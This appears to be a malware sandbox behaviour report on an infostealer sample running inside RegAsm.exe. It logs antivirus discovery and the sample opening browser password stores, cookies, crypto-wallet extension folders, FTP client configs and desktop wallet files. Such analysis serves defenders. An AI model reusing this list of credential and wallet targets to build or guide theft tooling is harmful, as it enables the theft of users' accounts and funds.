      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\qeUaxJCA3FO.exeCode function: 0_2_00F9B594 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00F9B594
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
      Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
      Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: RegAsm.exe, 00000002.00000002.1768091820.00000000013F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
      Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla\Notes9.dbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
